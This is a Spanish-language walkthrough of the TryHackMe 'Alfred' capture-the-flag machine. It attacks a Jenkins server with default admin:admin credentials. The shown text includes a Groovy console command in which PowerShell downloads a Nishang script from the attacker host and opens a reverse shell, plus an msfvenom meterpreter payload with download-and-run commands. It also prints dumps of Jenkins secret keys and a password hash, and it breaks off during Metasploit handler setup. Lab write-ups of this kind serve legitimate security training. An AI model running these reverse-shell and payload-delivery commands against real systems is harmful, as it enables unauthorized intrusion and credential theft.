En esta sala, aprenderemos cómo aprovechar una configuración errónea común en un servidor de automatización ampliamente utilizado (Jenkins: esta herramienta se utiliza para crear canales de integración/desarrollo continuo que permiten a los desarrolladores implementar automáticamente su código una vez que realizaron cambios). . Después de lo cual, usaremos un interesante método de escalada de privilegios para obtener acceso completo al sistema.
Dado que se trata de una aplicación de Windows, usaremos Nishang para obtener acceso inicial. El repositorio contiene un útil conjunto de scripts para acceso inicial, enumeración y escalada de privilegios. En este caso, usaremos los scripts de shell inversos .
En la máquina "Alfred" de TryHackMe, se aborda la explotación de Jenkins por credenciales debiles o por defecto para obtener un shell inicial y, posteriormente, se escalan los privilegios mediante la explotación de tokens de autenticación de Windows. Aquí está un resumen paso a paso:
Acceso Inicial
Escaneo Inicial: Se identifican 3 puertos TCP abiertos mediante un escaneo de Nmap.
Credenciales del Panel de Inicio de Sesión: Se descubren las credenciales predeterminadas del panel de inicio de sesión de Jenkins como "admin:admin".
Explotación de Jenkins: Se utiliza el script Invoke-PowerShellTcp de Nishang sirviendolo desde nuestro servidor python, descargandolo en jenkins y ejecutandolo desde el panel de ejecucion de script qeu nos daba jenkins basado en java, para obtener acceso inicial al sistema a través de un shell inverso.
Cambio de Shell
Generación de Payload: Se utiliza msfvenom para generar un payload de exe para el cambio de shell.
Descarga y Ejecución del Payload: La carga útil se descarga en el sistema de destino y se ejecuta.
Configuración de Metasploit: Se configura un controlador Metasploit con multi handler para establecer una conexión de sesion meterpreter.
Escalada de Privilegios
Tokens y Privilegios: Se examinan los tokens y privilegios disponibles con comandos como whoami /priv y list_tokens -g.
Uso de Incógnito: Se carga y utiliza el módulo Incognito en Metasploit para explotar privilegios.
Migración de Proceso: Se migra a un proceso seguro como services.exe para garantizar los permisos adecuados.
Lectura de la Bandera de Usuario: Se pasa de nuevo a una shell comun y se lee la bandera user.txt ubicada en algún lugar del sistema.
Lectura de la Bandera de Root: Finalmente, con el comando search anterior buscamos y encontramos la ruta del la bandera root.txt y se lee el archivo root.txt ubicado en C:\Windows\System32\config.
Este enfoque abarca desde la identificación de servicios y credenciales hasta la explotación inicial de Jenkins, el cambio de shell utilizando Metasploit y, finalmente, la escalada de privilegios mediante la explotación de tokens de autenticación de Windows y el migrado de proceso pid para asegurarnos el autority system en todo el sistema.
Last updated
// Some code
PENTESTING OFENSIVO:
MAQUINA ALFRED (JENKINS):
VERIFICAMOS CONECCION Y NO RESPONDE TRASAS ICMP; POR QUE ES WINDOWS:
┌──(root㉿kali)-[~]
└─# ping -c 1 10.10.234.163
PING 10.10.234.163 (10.10.234.163) 56(84) bytes of data.
INVESTIGANDO URL : 10.10.234.163:80 :
<br>
RIP Bruce Wayne<br><br>
Donations to <strong>alfred@wayneenterprises.com</strong> are greatly appreciated.
</center>
VERIFICO POSIBLES OTROS DIRECTORIOS :
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://10.10.234.163/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.234.163/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2024/01/21 23:10:37 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 289]
Progress: 4249 / 4615 (92.07%)===============================================================
2024/01/21 23:10:38 Finished
===============================================================
ESCANE DE PUERTOS Y VULNERABILIDADES:
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -O -Pn --script "vuln" 10.10.234.163
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-21 22:59 UTC
Stats: 0:00:02 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Stats: 0:05:17 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 86.10% done; ETC: 23:05 (0:00:49 remaining)
Stats: 0:10:13 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.55% done; ETC: 23:10 (0:00:03 remaining)
Nmap scan report for ip-10-10-234-163.eu-west-1.compute.internal (10.10.234.163)
Host is up (0.0010s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| vulners:
| cpe:/a:microsoft:internet_information_services:7.5:
| CVE-2010-3972 10.0 https://vulners.com/cve/CVE-2010-3972
| SSV:20122 9.3 https://vulners.com/seebug/SSV:20122 *EXPLOIT*
| CVE-2010-2730 9.3 https://vulners.com/cve/CVE-2010-2730
| SSV:20121 4.3 https://vulners.com/seebug/SSV:20121 *EXPLOIT*
|_ CVE-2010-1899 4.3 https://vulners.com/cve/CVE-2010-1899
|_http-server-header: Microsoft-IIS/7.5
|_http-dombased-xss: Couldn't find any DOM based XSS.
3389/tcp open tcpwrapped
|_ssl-ccs-injection: No reply from server (TIMEOUT)
8080/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /robots.txt: Robots file
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
MAC Address: 02:A5:BD:32:71:37 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 or Windows 8 (90%), Microsoft Windows 7 SP1 (90%), Microsoft Windows 8.1 R1 (90%), Microsoft Windows Server 2008 or 2008 Beta 3 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 Professional or Windows 8 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (89%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 767.71 seconds
CORROBORAMOS PUERTO 8080:
http://10.10.234.163:8080/robots.txt
# we don't want robots to click "build" links
User-agent: *
Disallow: /
http://10.10.234.163:8080/login?from=%2F
Welcome to Jenkins!
Username:
Contraseña:
Keep me signed in
NOS LOGRAMOS LOGUEAR CON ADMIN:ADMIN:
[Jenkins]Jenkins admin | Desconectar
búsqueda
2
Hay una nueva versión de Jenkins disponible (2.249.1). descargar (listado de cambios).
O actualizar automáticamente
Go to plugin manager
Configure which of these warnings are shown
Warnings have been published for the following currently installed components.
Jenkins 2.190.1 core and libraries
Multiple security vulnerabilities in Jenkins 2.251 and earlier, LTS 2.235.3 and earlier
Multiple security vulnerabilities in Jenkins 2.227 and earlier, LTS 2.204.5 and earlier
Multiple vulnerabilities in Jenkins 2.218 and earlier, LTS 2.204.1 and earlier
Multiple security vulnerabilities in Jenkins 2.244 and earlier, LTS 2.235.1 and earlier
Subversion Plug-in 2.12.2
Stored XSS vulnerability
Git plugin 3.12.1
Stored XSS vulnerability
Email Extension Plugin 2.68
Missing hostname validation
Matrix Authorization Strategy Plugin 2.5
Stored XSS vulnerability
Timestamper 1.10
Stored XSS vulnerability
Credentials Binding Plugin 1.20
Improper masking of some secrets
Secrets are not masked in builds without build steps
Matrix Project Plugin 1.14
Stored XSS vulnerability in single axis builds tooltips
Stored XSS vulnerability in multiple axis builds tooltips
Lockable Resources plugin 2.6
CSRF vulnerability
Pipeline: Groovy 2.74
Sandbox bypass via default method parameter expression
Script Security Plugin 1.66
Sandbox bypass vulnerability
Sandbox bypass vulnerability
Stored XSS vulnerability
Sandbox bypass vulnerability
Sandbox bypass vulnerability
Mailer Plugin 1.29
Missing hostname validation
Manage Jenkins
ACTIVAR AUTO REFRESCO
Jenkins
Nueva Tarea
Personas
Historial de trabajos
Administrar Jenkins
Mis vistas
Lockable Resources
Credentials
New View
collapseTrabajos en la cola
No hay trabajos en la cola
collapseEstado del ejecutor de construcciones
1 Inactivo
2 Inactivo
añadir descripción
Todo
+
S
W
Nombre ↓
Último Éxito
Último Fallo
Última Duración
Correcto 100% project 4 Año 2 Mes - #1 N/D 0.42 Seg Schedule a Build for project
EN EL SITIO WEB DEL PANEL DE ADMINISTRADOR DE JENKINS http://10.10.234.163:8080/computer/(master)/script:
Consola de scripts
Escribe un 'script' Groovy script y ejecutaló en el servidor. Es útil para depurar e investigar problemas. Usa 'println' para ver la salida (si usas System.out, se escribirá en la salida 'stdout' del servidor, lo que es más difícil de visualizar). Ejemplo:
println System.getenv("PATH")
println "uname -a".execute().text
Esta ejecución se hace en la máquina virtual (JVM) del agente.
Todas las clases de todos los plugins son visibles. Los paquetes: jenkins.*, jenkins.model.*, hudson.*, y hudson.model.*, se importarán automáticamente.
println "whoami".execute().text
Resultado
alfred\bruce
YA QUE VIMOS QUE PODEMOS EJECUTAR COMANDOS VAMOS A INTENTAR PASAR DESDE UN SERVIDOR PYTHON NUESTRO SCRIPT PARA OPTENER UNA REVERSE SHEL A LA ESCUCHA DE LA MISMA CON NETCAT:
println "powershell iex (New-Object Net.WebClient).DownloadString(\'http://10.10.217.63:8081/Invoke-PowerShellTcp.ps1\');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.217.63 -Port 443".execute().text
BINGO NUESTRO NETCAT ESCUCHO LA SHELL:
┌──(root㉿kali)-[~/Downloads]
└─# python3 -m http.server 8081
Serving HTTP on 0.0.0.0 port 8081 (http://0.0.0.0:8081/) ...
10.10.234.163 - - [22/Jan/2024 00:41:29] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
10.10.234.163 - - [22/Jan/2024 00:41:33] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
┌──(root㉿kali)-[~]
└─# nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.217.63] from (UNKNOWN) [10.10.234.163] 49334
Windows PowerShell running as user bruce on ALFRED
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Program Files (x86)\Jenkins>whoami
alfred\bruce
PS C:\Program Files (x86)\Jenkins>
PS C:\Program Files (x86)\Jenkins> dir
Directory: C:\Program Files (x86)\Jenkins
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 10/26/2019 4:37 PM jobs
d---- 10/25/2019 9:54 PM jre
d---- 10/25/2019 9:55 PM logs
d---- 10/25/2019 9:55 PM nodes
d---- 10/25/2019 7:58 PM plugins
d---- 10/26/2019 4:38 PM secrets
d---- 10/3/2020 3:42 PM updates
d---- 10/25/2019 9:55 PM userContent
d---- 10/25/2019 9:55 PM users
d---- 10/25/2019 9:54 PM war
d---- 10/25/2019 7:58 PM workflow-libs
d---- 10/26/2019 4:38 PM workspace
-a--- 1/21/2024 10:27 PM 0 .lastStarted
-a--- 1/21/2024 11:55 PM 36 .owner
-a--- 1/21/2024 10:27 PM 1742 config.xml
-a--- 1/21/2024 10:27 PM 156 hudson.model.UpdateCenter.xml
-a--- 10/25/2019 7:58 PM 374 hudson.plugins.git.GitTool.xml
-a--- 10/25/2019 9:55 PM 1712 identity.key.enc
-a--- 1/21/2024 11:12 PM 117240 jenkins.err.log
-a--- 9/25/2019 2:10 PM 371200 jenkins.exe
-a--- 4/5/2015 6:05 PM 219 jenkins.exe.config
-a--- 10/25/2019 7:59 PM 7 jenkins.install.InstallUtil.lastEx
ecVersion
-a--- 10/25/2019 7:59 PM 7 jenkins.install.UpgradeWizard.stat
e
-a--- 10/25/2019 7:59 PM 177 jenkins.model.JenkinsLocationConfi
guration.xml
-a--- 1/21/2024 10:26 PM 1992 jenkins.out.log
-a--- 1/21/2024 10:26 PM 4 jenkins.pid
-a--- 10/25/2019 9:55 PM 171 jenkins.telemetry.Correlator.xml
-a--- 9/25/2019 2:05 PM 78245883 jenkins.war
-a--- 1/21/2024 10:26 PM 22494 jenkins.wrapper.log
-a--- 9/25/2019 2:10 PM 2875 jenkins.xml
-a--- 1/21/2024 10:27 PM 907 nodeMonitors.xml
-a--- 10/26/2019 4:39 PM 129 queue.xml.bak
-a--- 10/25/2019 9:54 PM 64 secret.key
-a--- 10/25/2019 9:54 PM 0 secret.key.not-so-secret
PS C:\Program Files (x86)\Jenkins> type config.xml
<?xml version='1.1' encoding='UTF-8'?>
<hudson>
<disabledAdministrativeMonitors>
<string>hudson.diagnosis.ReverseProxySetupMonitor</string>
</disabledAdministrativeMonitors>
<version>2.190.1</version>
<installStateName>RUNNING</installStateName>
<numExecutors>2</numExecutors>
<mode>NORMAL</mode>
<useSecurity>true</useSecurity>
<authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy">
<denyAnonymousReadAccess>true</denyAnonymousReadAccess>
</authorizationStrategy>
<securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
<disableSignup>true</disableSignup>
<enableCaptcha>false</enableCaptcha>
</securityRealm>
<disableRememberMe>false</disableRememberMe>
<projectNamingStrategy class="jenkins.model.ProjectNamingStrategy$DefaultProjectNamingStrategy"/>
<workspaceDir>${JENKINS_HOME}/workspace/${ITEM_FULL_NAME}</workspaceDir>
<buildsDir>${ITEM_ROOTDIR}/builds</buildsDir>
<jdks/>
<viewsTabBar class="hudson.views.DefaultViewsTabBar"/>
<myViewsTabBar class="hudson.views.DefaultMyViewsTabBar"/>
<clouds/>
<scmCheckoutRetryCount>0</scmCheckoutRetryCount>
<views>
<hudson.model.AllView>
<owner class="hudson" reference="../../.."/>
<name>all</name>
<filterExecutors>false</filterExecutors>
<filterQueue>false</filterQueue>
<properties class="hudson.model.View$PropertyList"/>
</hudson.model.AllView>
</views>
<primaryView>all</primaryView>
<slaveAgentPort>-1</slaveAgentPort>
<label></label>
<crumbIssuer class="hudson.security.csrf.DefaultCrumbIssuer">
<excludeClientIPFromCrumb>false</excludeClientIPFromCrumb>
</crumbIssuer>
<nodeProperties/>
<globalNodeProperties/>
</hudson>
PS C:\Program Files (x86)\Jenkins>
PS C:\Program Files (x86)\Jenkins> type jenkins.xml
<!--
The MIT License
Copyright (c) 2004-2017, Sun Microsystems, Inc., Kohsuke Kawaguchi, Oleg Nenashev, and other Jenkins contributors
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
-->
<!--
Windows service definition for Jenkins.
To uninstall, run "jenkins.exe stop" to stop the service, then "jenkins.exe uninstall" to uninstall the service.
Both commands don't produce any output if the execution is successful.
-->
<service>
<id>Jenkins</id>
<name>Jenkins</name>
<description>This service runs Jenkins automation server.</description>
<env name="JENKINS_HOME" value="%BASE%"/>
<!--
if you'd like to run Jenkins with a specific version of Java, specify a full path to java.exe.
The following value assumes that you have java in your PATH.
-->
<executable>%BASE%\jre\bin\java</executable>
<arguments>-Xrs -Xmx256m -Dhudson.lifecycle=hudson.lifecycle.WindowsServiceLifecycle -jar "%BASE%\jenkins.war" --httpPort=8080 --webroot="%BASE%\war"</arguments>
<!--
interactive flag causes the empty black Java window to be displayed.
I'm still debugging this.
<interactive />
-->
<logmode>rotate</logmode>
<onfailure action="restart" />
<!--
In the case WinSW gets terminated and leaks the process, we want to abort
these runaway JAR processes on startup to prevent corruption of JENKINS_HOME.
So this extension is enabled by default.
-->
<extensions>
<!-- This is a sample configuration for the RunawayProcessKiller extension. -->
<extension enabled="true"
className="winsw.Plugins.RunawayProcessKiller.RunawayProcessKillerExtension"
id="killOnStartup">
<pidfile>%BASE%\jenkins.pid</pidfile>
<stopTimeout>10000</stopTimeout>
<stopParentFirst>false</stopParentFirst>
</extension>
</extensions>
<!-- See the referenced examples for more options -->
</service>
PS C:\Program Files (x86)\Jenkins> type secret.key
cb2ae36e1862a23b3adfd393282eae76f896f2efb0a4da79643e33afc616751e
PS C:\Program Files (x86)\Jenkins\secrets> type initialAdminPassword
44b934851a1b4275a4b23864b35eb382
PS C:\Program Files (x86)\Jenkins\secrets> type master.key
8f79dbdfea03f2e4403e72d9e16b683028de4ef9e00a448b6dd0f2b78258bd0f6c01c6922ffaa0c784038aa59e268fab0d58d10bd40110930f3db32a3bff82370458db4f0c7ec9c510e1b339119b5fd108256c37ab4d17d2503887b2ea27c8f55e0813777e3f4043310dfd3a17cc1267fa48b188a5fdd3f04f90be9da7927594
PS C:\Program Files (x86)\Jenkins\users> dir
Directory: C:\Program Files (x86)\Jenkins\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 10/25/2019 10:16 PM admin_2402805306885826995
-a--- 10/25/2019 9:55 PM 300 users.xml
PS C:\Program Files (x86)\Jenkins\users> type users.xml
<?xml version='1.1' encoding='UTF-8'?>
<hudson.model.UserIdMapper>
<version>1</version>
<idToDirectoryNameMap class="concurrent-hash-map">
<entry>
<string>admin</string>
<string>admin_2402805306885826995</string>
</entry>
</idToDirectoryNameMap>
</hudson.model.UserIdMapper>
PS C:\Program Files (x86)\Jenkins\users>
PS C:\Program Files (x86)\Jenkins\users\admin_2402805306885826995> dir
Directory: C:\Program Files (x86)\Jenkins\users\admin_2402805306885826995
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 10/25/2019 10:16 PM 2854 config.xml
PS C:\Program Files (x86)\Jenkins\users\admin_2402805306885826995> type config.xml
<?xml version='1.1' encoding='UTF-8'?>
<user>
<version>10</version>
<id>admin</id>
<fullName>admin</fullName>
<description></description>
<properties>
<jenkins.security.ApiTokenProperty>
<tokenStore>
<tokenList/>
</tokenStore>
</jenkins.security.ApiTokenProperty>
<com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="credentials@2.3.0">
<domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
<entry>
<com.cloudbees.plugins.credentials.domains.Domain>
<specifications/>
</com.cloudbees.plugins.credentials.domains.Domain>
<java.util.concurrent.CopyOnWriteArrayList/>
</entry>
</domainCredentialsMap>
</com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty>
<hudson.tasks.Mailer_-UserProperty plugin="mailer@1.29">
<emailAddress></emailAddress>
</hudson.tasks.Mailer_-UserProperty>
<hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty plugin="email-ext@2.68">
<triggers/>
</hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty>
<jenkins.security.LastGrantedAuthoritiesProperty>
<roles>
<string>authenticated</string>
</roles>
<timestamp>1572029777633</timestamp>
</jenkins.security.LastGrantedAuthoritiesProperty>
<hudson.model.MyViewsProperty>
<primaryViewName></primaryViewName>
<views>
<hudson.model.AllView>
<owner class="hudson.model.MyViewsProperty" reference="../../.."/>
<name>all</name>
<filterExecutors>false</filterExecutors>
<filterQueue>false</filterQueue>
<properties class="hudson.model.View$PropertyList"/>
</hudson.model.AllView>
</views>
</hudson.model.MyViewsProperty>
<org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="display-url-api@2.3.2">
<providerId>default</providerId>
</org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>
<hudson.model.PaneStatusProperties>
<collapsed/>
</hudson.model.PaneStatusProperties>
<hudson.security.HudsonPrivateSecurityRealm_-Details>
<passwordHash>#jbcrypt:$2a$10$mNcW44UpK2W/FfiniX6qfeIhqBnJqLQLw8MLaP/lTM1vmh.E6AGAS</passwordHash>
</hudson.security.HudsonPrivateSecurityRealm_-Details>
<org.jenkinsci.main.modules.cli.auth.ssh.UserPropertyImpl>
<authorizedKeys></authorizedKeys>
</org.jenkinsci.main.modules.cli.auth.ssh.UserPropertyImpl>
<jenkins.security.seed.UserSeedProperty>
<seed>9c55e7a1a712f843</seed>
</jenkins.security.seed.UserSeedProperty>
<hudson.search.UserSearchProperty>
<insensitiveSearch>true</insensitiveSearch>
</hudson.search.UserSearchProperty>
</properties>
</user>
PS C:\Program Files (x86)\Jenkins\users\admin_2402805306885826995> dir
Directory: C:\Program Files (x86)\Jenkins\users\admin_2402805306885826995
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 10/25/2019 10:16 PM 2854 config.xml
PS C:\Program Files (x86)\Jenkins\users\admin_2402805306885826995> cd ..
PS C:\Program Files (x86)\Jenkins\users> dir
Directory: C:\Program Files (x86)\Jenkins\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 10/25/2019 10:16 PM admin_2402805306885826995
-a--- 10/25/2019 9:55 PM 300 users.xml
PS C:\Program Files (x86)\Jenkins> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Disabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled
SeCreatePagefilePrivilege Create a pagefile Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links Disabled
PS C:\Users> cd bruce
PS C:\Users\bruce> dir
Directory: C:\Users\bruce
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 10/25/2019 8:05 PM .groovy
d-r-- 10/25/2019 9:51 PM Contacts
d-r-- 10/25/2019 11:22 PM Desktop
d-r-- 10/26/2019 4:43 PM Documents
d-r-- 10/26/2019 4:43 PM Downloads
d-r-- 10/25/2019 9:51 PM Favorites
d-r-- 10/25/2019 9:51 PM Links
d-r-- 10/25/2019 9:51 PM Music
d-r-- 10/25/2019 10:26 PM Pictures
d-r-- 10/25/2019 9:51 PM Saved Games
d-r-- 10/25/2019 9:51 PM Searches
d-r-- 10/25/2019 9:51 PM Videos
BANDERA:
PS C:\Users\bruce> cd Desktop
PS C:\Users\bruce\Desktop> dir
Directory: C:\Users\bruce\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 10/25/2019 11:22 PM 32 user.txt
PS C:\Users\bruce\Desktop> type user.txt
79007a09481963edf2e1321abd9ae2a0
AHORA NOS CONECTAMOS USANDO METASPLOIT Y CONSEGUIIMOS UNA SESSION DE METERPRETER PARA FACILITAR LA ESCALADA DE PRIVILEGIOS, ANTES CREAMOS UN PAYLOAD EXPLOIT CON MSFVENOM PARA CONSEGUIR LA SHELL METERPRETER REVERSA Y ESCUCHARLA CON MULTIHANDLER :
┌──(root㉿kali)-[~/Downloads]
└─# msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.10.217.63 LPORT=4444 -f exe -o shell-paimon.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of exe file: 73802 bytes
Saved as: shell-paimon.exe
LO SERVIMOS CON SERVER PYTHON:
┌──(root㉿kali)-[~/Downloads]
└─# python3 -m http.server 8081
Serving HTTP on 0.0.0.0 port 8081 (http://0.0.0.0:8081/) ...
10.10.234.163 - - [22/Jan/2024 00:41:29] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
10.10.234.163 - - [22/Jan/2024 00:41:33] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
DESCARAMOS EL ARCHIVO CREADO POR MSFVENOM EN LA MAQUINA VICTIMA JENKINS PARA LUEGO EJECUTARLO Y TENER LA CONEXION EN MULTIHANDLER CON LA SESIUON DE METERPRETER:
PRUEBAS NOMAS:
println "powershell iex (New-Object Net.WebClient).DownloadString(\'http://10.10.217.63:8081/shell-paimon.exe\');shell-paimon.exe".execute().text
println "powershell (New-Object System.Net.WebClient).Downloadfile('http://10.10.217.63:8081/shell-paimon.exe\','shell-paimon.exe')
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.217.63:8081/shell-paimon.exe','shell-paimon.exe')"
println "powershell iex (New-Object Net.WebClient).DownloadString(\'http://10.10.217.63:8081/shell-paimon.exe\');shell-paimon.exe".execute().text
METERPRETER:
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.143.22:8081/shell-paimon.exe','shell-paimon.exe')"
EJECUTAMOS EL ARCHIVO:
Start-Process "shell-paimon.exe"
NETCAT:
println "powershell iex (New-Object Net.WebClient).DownloadString(\'http://10.10.143.22:8081/Invoke-PowerShellTcp.ps1\');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.143.22 -Port 443".execute().text
METASPLOIT CONFIUGURACION:
──(root㉿kali)-[~]
└─# msfconsole
.;lxO0KXXXK0Oxl:.
,o0WMMMMMMMMMMMMMMMMMMKd,
'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
:KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
.KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
lWMMMMMMMMMMMXd:.. ..;dKMMMMMMMMMMMMo
xMMMMMMMMMMWd. .oNMMMMMMMMMMk
oMMMMMMMMMMx. dMMMMMMMMMMx
.WMMMMMMMMM: :MMMMMMMMMM,
xMMMMMMMMMo lMMMMMMMMMO
NMMMMMMMMW ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW. ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd ,0MMMMMMMMMMK;
.WMMMMMMMMMc 'OMMMMMM0,
lMMMMMMMMMMk. .kMMO'
dMMMMMMMMMMWd' ..
cWMMMMMMMMMMMNxc'. ##########
.0MMMMMMMMMMMMMMMMWc #+# #+#
;0MMMMMMMMMMMMMMMo. +:+
.dNMMMMMMMMMMMMo +#++:++#+
'oOWMMMMMMMMo +:+
.,cdkO0K; :+: :+:
:::::::+:
Metasploit
=[ metasploit v6.2.23-dev ]
+ -- --=[ 2259 exploits - 1188 auxiliary - 402 post ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: After running db_nmap, be sure to
check out the result of hosts and services
Metasploit Documentation: https://docs.metasploit.com/
msf6 > set /multi/handler
/multi/handler =>
msf6 > options
Global Options:
===============
Option Current Setting Description
------ --------------- -----------
ConsoleLogging false Log all console input and output
LogLevel 0 Verbosity of logs (default 0, max 3)
MeterpreterPrompt meterpreter The meterpreter prompt string
MinimumRank 0 The minimum rank of exploits that will run without explicit confirm
ation
Prompt msf6 The prompt string
PromptChar > The prompt character
PromptTimeFormat %Y-%m-%d %H:%M:%S Format for timestamp escapes in prompts
SessionLogging false Log all input and output for sessions
SessionTlvLogging false Log all incoming and outgoing TLV packets
TimestampOutput false Prefix all console output with a timestamp
msf6 > back
msf6 > search multi handler
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/local/apt_package_manager_persistence 1999-03-09 excellent No APT Package Manager Persistence
1 exploit/android/local/janus 2017-07-31 manual Yes Android Janus APK Signature bypass
2 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
3 exploit/linux/local/bash_profile_persistence 1989-06-08 normal No Bash Profile Persistence
4 exploit/linux/local/desktop_privilege_escalation 2014-08-07 excellent Yes Desktop Linux Password Stealer and Privilege Escalation
5 exploit/multi/handler manual No Generic Payload Handler
6 exploit/multi/http/hp_sitescope_uploadfileshandler 2012-08-29 good No HP SiteScope Remote Code Execution
7 exploit/windows/firewall/blackice_pam_icq 2004-03-18 great No ISS PAM.dll ICQ Parser Buffer Overflow
8 exploit/windows/browser/ms05_054_onload 2005-11-21 normal No MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution
